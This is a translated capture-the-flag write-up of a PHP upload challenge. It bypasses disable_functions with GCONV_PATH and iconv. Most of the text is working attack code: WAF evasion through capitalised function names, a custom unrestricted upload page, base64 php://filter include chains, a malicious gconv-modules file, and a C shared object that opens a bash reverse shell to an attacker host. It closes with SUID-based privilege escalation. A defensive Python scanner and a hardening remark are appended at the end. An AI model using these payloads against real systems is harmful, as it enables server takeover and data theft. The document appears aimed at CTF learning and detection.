Topic: using GCONV_PATH and iconv to bypass disable_functions

Reference: "使用GCONV_PATH与iconv进行bypass disable_functions" (Using GCONV_PATH and iconv to bypass disable_functions, gconv-modules; CSDN blog)
Challenge analysis:

- The challenge is a file upload. I uploaded an arbitrary txt file and the response showed that only php files are accepted. So construct a file containing `<?php phpinfo();?>`, upload it, and check the output.
- A large number of functions are filtered, so a disable_functions bypass is needed. The PHP version is 8.0.1, so the antsword bypass does not work. However, show_source, include, base64 and similar functions are not filtered, so show_source can be used to read the index.php source: construct a file containing `<?php Show_source('/var/www/html/index.php');?>` and upload it (show_source is blocked by the WAF, so bypass it with a capital letter). The output:

```php
// index.php source
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"]; // content restriction
    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }
    return False;
}
error_reporting(0);
// set the upload directory
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_name = $_FILES['upload_file']['name'];
    $ext = pathinfo($file_name,PATHINFO_EXTENSION);
    if(!preg_match("/php/i", strtolower($ext))){
        die("只要好看的php"); // extension restriction
    }
    $content = file_get_contents($temp_file);
    if(fun($content)){
        die("诶,被我发现了吧");
    }
    $new_file_name = md5($file_name).".".$ext;
    $img_path = UPLOAD_PATH . '/' . $new_file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
        die();
    }
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
```
index.php restricts the type of file we can upload. To bypass disable_functions with GCONV_PATH and iconv we first have to get past the extension restriction, so we need to build our own upload page with no extension restriction. This takes two steps:

1. Build a php upload page with no extension restriction, adapted from the challenge source. The file content must be base64-encoded when it is uploaded, to get past the content check in index.php.

```php
// base64upload.php
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
error_reporting(0);
// set the upload directory
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_name = $_FILES['upload_file']['name'];
    $img_path = UPLOAD_PATH . '/' . $file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
        die();
    }
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
// path: ./uploads/ee69fd8184001342fbd3f643aa86edb6.php
```

2. Build a php file that uses include to include the file uploaded in step 1 and base64-decode it (the base64 argument below decodes to `php://filter/read=convert.base64-decode/resource=ee69fd8184001342fbd3f643aa86edb6.php`). This gives us an unrestricted file upload.

```php
// includeupload.php
<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWVlNjlmZDgxODQwMDEzNDJmYmQzZjY0M2FhODZlZGI2LnBocA=="));?>
// path: /uploads/e575807ac6647c61b2b5a54dd8d338c6.php
```
Now prepare the files for the GCONV_PATH and iconv disable_functions bypass:

1. Prepare the gconv-modules file and upload it to /tmp through the unrestricted upload page we built. Its contents:

```text
module  MGG//  INTERNAL  ../../../../../../../../tmp/mgg  2
module  INTERNAL  MGG//  ../../../../../../../../tmp/mgg  2
```
2. Prepare mgg.so. First write the following in mgg.c:

```c
#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
    system("bash -c 'exec bash -i >& /dev/tcp/vps/port 0>&1'");
}
```
3. In a terminal run `gcc mgg.c -o mgg.so -shared -fPIC`, then upload mgg.so to /tmp.
4. Prepare shell.php, base64-encode it and upload it, then include it through includeshell.php. This failed, though: phpinfo shows that iconv is disabled, so a different trigger is needed.

```php
// shell.php
<?php
putenv("GCONV_PATH=/tmp/");
iconv("mgg", "UTF-8", "whatever");
?>
// path: 25a452927110e39a345a2511c57647f2.php

// includeshell.php
<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPTI1YTQ1MjkyNzExMGUzOWEzNDVhMjUxMWM1NzY0N2YyLnBocA=="));?>
// path: 1e106be92d196c433f803f11c16e534c.php
```
5. Besides calling the iconv function directly, the iconv conversion filter in php://filter also triggers the two malicious files. Change shell.php to the following, base64-encode and upload it, then include it through includeshell.php:

```php
<?php
putenv("GCONV_PATH=/tmp/");
include('php://filter/read=convert.iconv.mgg.utf-8/resource=/tmp/mgg.so');
?>
```
6. We get a shell, but reading the flag fails for lack of permissions, so privilege escalation is needed. Run `find / -perm -u=s -type f 2>/dev/null` to list files with the SUID bit; nl is one of them, so use nl to read the flag.
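As an added defensive example (not part of this writeup or the challenge), the following Python scanner reproduces the challenge's case-sensitive blacklist check next to a check that lowercases the content and also inspects base64 runs inside it, so all three evasions used above (the capitalised `Show_source`/`Include`, the base64-encoded upload decoded through `php://filter`, and the `GCONV_PATH` plus `convert.iconv` trigger) are flagged. The sample uploads are constructed and the indicator names are my own.

```python
import base64
import re

# Subset of the challenge's fun() blacklist, plus iconv, which that list lacks.
BLACKLIST = ["eval", "include", "show_source", "highlight_file",
             "putenv", "system", "iconv"]

# Indicators of this specific technique (the names are my own).
INDICATORS = {
    "filter-base64": re.compile(r"php://filter/\S*convert\.base64-decode", re.I),
    "filter-iconv": re.compile(r"convert\.iconv\.", re.I),
    "gconv-path": re.compile(r"GCONV_PATH", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def challenge_check(content: str) -> bool:
    """The challenge's own check: case-sensitive strstr(), so Show_source passes."""
    return any(word in content for word in BLACKLIST)


def decoded_blobs(content: str):
    """Yield the UTF-8 decoding of every base64-looking run in the content."""
    for blob in BASE64_BLOB.findall(content):
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue


def scan(content: str) -> set:
    """Case-insensitive scan of the raw text and of any base64 payload in it."""
    found = set()
    for text in [content, *decoded_blobs(content)]:
        low = text.lower()
        found.update(w for w in BLACKLIST if w in low)
        found.update(n for n, p in INDICATORS.items() if p.search(text))
    return found


# Constructed samples mirroring the three uploads in the writeup.
SAMPLE_CASE = "<?php Show_source('/var/www/html/index.php');?>"
SAMPLE_INCLUDE = ('<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQt'
                  'ZGVjb2RlL3Jlc291cmNlPWVlNjlmZDgxODQwMDEzNDJmYmQzZjY0M2FhODZlZGI2LnBocA=="));?>')
SAMPLE_GCONV = base64.b64encode(
    b'<?php putenv("GCONV_PATH=/tmp/"); '
    b'include("php://filter/read=convert.iconv.mgg.utf-8/resource=/tmp/mgg.so"); ?>'
).decode()
```

The real fix is still not a better blacklist: serve uploads from a directory where PHP is not executed, and do not accept a php extension at all.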